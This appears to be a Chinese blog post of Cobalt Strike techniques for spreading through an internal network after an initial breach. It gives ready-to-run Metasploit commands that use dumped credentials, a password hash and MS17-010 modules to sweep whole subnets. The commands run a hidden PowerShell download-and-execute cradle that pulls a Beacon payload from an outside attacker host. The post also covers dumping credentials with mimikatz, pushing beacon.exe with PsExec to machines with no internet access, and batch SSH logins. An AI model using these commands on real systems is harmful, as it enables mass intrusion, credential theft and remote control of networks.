Cobalt Strike使用的一些技巧
利用msf模块上线beacon shell
当通过CS的mimikatz或者其他方式获得了目标机器的明文密码或者哈希时,可以利用metasploit的psexec_command模块来上线CS的beacon shell。
1.先通过CS生成上线Beacon的powershell
本地启动metasploit,挂上代理,设置psexec_command参数。
msf5 > setg Proxies socks4/5:97.xx.xx.23:1025
msf5 > use auxiliary/admin/smb/psexec_command
msf5 > set rhosts 192.168.52.0/24
msf5 > set threads 20
msf5 > set smbuser administrator
msf5 > set smbpass 579da618cfbfa85247acf1f800a280a4
msf5 > set command powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://97.xx.xx.23:82/a'))"
msf5 > run
当进入内网后,拿下一台或某几台机器时,若密码相同或相似,可以使用该方式直接通扫内网,可以做到机器批量上线。
通过ms17-010通扫内网(未成功!!!)
如果内网发现大量主机存在ms17-010,直接使用exploit/windows/smb/ms17_010_eternalblue该模块容易造成蓝屏,可以通过ms17_010命令执行模块做到批量上线。如:ms17_010_command、ms17_010_psexec等。
setg Proxies socks4:97.xx.xx.23:1008
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.0/24
set threads 50
set command 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://97.xx.xx.23:82/a'))"'
run
use exploit/windows/smb/ms17_010_psexec set rhosts 192.168.100.2 set SMBUser guest set SMBPass 123456 run
当获取到一台目标服务器的权限,如果想扩大战果,获得目标凭证进行横向扩展登录是最快速有效的方式。需要考虑的是目标环境是否可出网,如何利用CS进行批量上线。
1.目标机器上线后先提权抓取凭证
Access---》run mimikatz(或者直接在Beacon中执⾏logonpasswords导出明文密码),或直接dumphash。导出凭证操作需要管理员权限。
通过工具栏的View---》Credentials可以查看已经获得的凭证
1)目标出网
psexec传递
获取凭证后可以对内网445进行探测,然后使用psexec传递登录
Beacon > portscan 192.168.52.0/24 445 arp 200
通过菜单栏View---》Targets查看目标机器列表,可以全部选中,批量右键登录
选择之前获取到的主机的凭证,并确定接受的Listener已经主机的session。
在Beacon中可以看到执行的命令,并显示成功登录的IP,这样就可以实现同时控制多台主机的权限。
2)目标机不出网
如果我们已经获取到目标内网中一台主机的权限,但是该主机处于隔离网中,无法连接互联网,此时,我们可以将这台已经获取权限的主机当做跳板,在它做上面做一个监听,实现链路上线。
1.首先,在已上线的主机上创建一个Listener
选择 Attacks->Packages->Windows Executable(Stageless),⽀持导出该类型Listener对应的可执
⾏⽂件或dll等。proxy不填。
上传刚才⽣成的payload到当前已上线的⽬标机中,还需要上传另⼀个⼯具PsExec.exe 。
(CobalStrike本身psexec功能不够强⼤,且⽅法不唯⼀)
在Beacon中使⽤PsExec⼯具将payload上传到不出⽹的⽬标机中,⾃动执⾏,即可上线。
beacon> shell C:\WINDOWS\Temp\PsExec.exe -accepteula
\192.168.190.130,192.168.190.132 -u administrator -p admin@123 -d -c
C:\WINDOWS\Temp\beacon.exe
因为这是link链接,只要主链路(即出⽹机Listener)掉线,就都会掉线!
3)ssh 批量登录
ssh批量登录⽐较简单,同样利⽤当前已上线的⽬标机进⾏登录。
beacon> portscan 192.168.144.170-210 22 arp 200
在Credentials中添加ssh的⼝令信息。(ssh⼝令可事先通过其他⽅式获取,不建议⽤此⼯具进⾏
ssh爆破,效率慢)
选择Login–>ssh登录。
选择刚添加的ssh⼝令,主机Session,即从哪台主机连接过去。
ssh成功登录后,就实现了Linux⽬标机的上线,在Beacon中可以看到执⾏的命令。若需要上线的
Linux主机不多,可直接在Beacon中执⾏命令。
Cobalt Strike使用的一些技巧的更多相关文章
- Cobalt Strike 3.13的新功能
Cobalt Strike 3.13现已推出.此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons. TCP Beacon Co ...
- Cobalt Strike 服务器搭建及使用
Cobalt Strike使用中的一些坑(一) http://www.cnblogs.com/miaodaren/articles/7829793.html cobaltstrike3.8服务器搭建及 ...
- Cobalt Strike DNS通讯实例
一.域名设置 如果没有域名,可以参考另一篇博客,申请Freenom免费域名,并使用DNSPod解析 链接:https://www.cnblogs.com/ssooking/p/6364639.html ...
- [工具]Cobalt Strike 3.13 TeamServer for Windows
Cobalt Strike 3.13 TeamServer for Windows 0x001 环境 CS 3.12 或 3.13 Kali或Win最好安装jdk1.8.5或之后版本 设置环境变量,如 ...
- Cobalt Strike 学习
前言 本文以一个模拟的域环境为例对 Cobalt Strike 的使用实践一波. 环境拓扑图如下: 攻击者(kali) 位于 192.168.245.0/24 网段,域环境位于 192.168.31. ...
- Cobalt Strike深入使用
System Profiler使用 System Profiler 模块,搜集目标的各类机器信息(操作系统版本,浏览器版本等) Attacks->web drive-by->System ...
- (转载)Cobalt Strike tutorial下针对CVE-2017-0199利用
CVE-2017-0199利用OLE对象嵌入Word / RTF文档的方式,使得可以在没有用户交互的情况下执行其内容.OLE由许多不同的程序支持,OLE通常用于使在另一个程序中可用的程序中创建的内容. ...
- Cobalt strike 第二节生成报告
0x00前言: 上一节我们说了怎么连接到服务器 0x01生成报告: 首先打开Cobalt Strike 点击Cobalt Strike -> Preferences Preferences Pe ...
- cobalt strike 第一节连接到团队的服务器
介绍:Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,jav ...
随机推荐
- MATLAB 安装
参考: 链接1 链接2 重要: 1.秘钥:09806-07443-53955-64350-21751-41297 2.在安装目录下替换 bin
- 初学源码之——银行案例手写IOC和AOP
手写实现lOC和AOP 上一部分我们理解了loC和AOP思想,我们先不考虑Spring是如何实现这两个思想的,此处准备了一个『银行转账」的案例,请分析该案例在代码层次有什么问题?分析之后使用我们已有知 ...
- Logback自定义日志颜色
片段 1 片段 2 LogbackColorful.java package cn.mrxionge.netdemo; import ch.qos.logback.classic.Level; imp ...
- Webpack + VueJS 学习、跳坑和总结
这篇随笔会陆续地更新下去,用于汇集一些关于Webpack的初学跳坑总结还有VueJS的基础知识. Webpack部分 ① 快速建立一个Webpack-Vue项目开发环境(4.39.1-2019/08/ ...
- 【Python】类
初探类 类定义与函数定义( def语句 )一样必须被执行才会起作用 调用 x.f() 其实就相当于 MyClass.f(x) 补充说明 数据属性会覆盖掉具有相同名称的方法属性 命名方法 方法名称使用大 ...
- 栈和队列数据结构的基本概念及其相关的Python实现
先来回顾一下栈和队列的基本概念: 相同点:从"数据结构"的角度看,它们都是线性结构,即数据元素之间的关系相同. 不同点:栈(Stack)是限定只能在表的一端进行插入和删除操作的线性 ...
- 源码安装IVRE
简介:IVRE(又名DRUNK)是一款开源的网络侦查框架工具,IVRE使用Nmap.Zmap进行主动网络探测.使用Bro.P0f等进行网络流量被动分析,探测结果存入数据库中,方便数据的查询.分类汇总统 ...
- <stdbool.h>的使用
转载: 1.https://www.cnblogs.com/jediael/archive/2013/02/03/4304259.html 2.https://zhidao.baidu.com/que ...
- 【题解】[SDOI2010]捉迷藏
题目链接:https://www.luogu.com.cn/problem/P2479 题目大意:求平面\(n\)个点中,到其它\(n-1\)个点的曼哈顿距离最大和最小距离之差最小的点,求出这个这个距 ...
- JavaScript按钮排他思想
要求: 有一系列按钮,要求每单击其中一个,该按钮改变样式(以背景颜色为例),其他按钮恢复保持默认样式. 实现思路: 获取所有按钮元素 首先先把其他按钮的背景颜色去掉 再单独设置自己的样式 代码实现: ...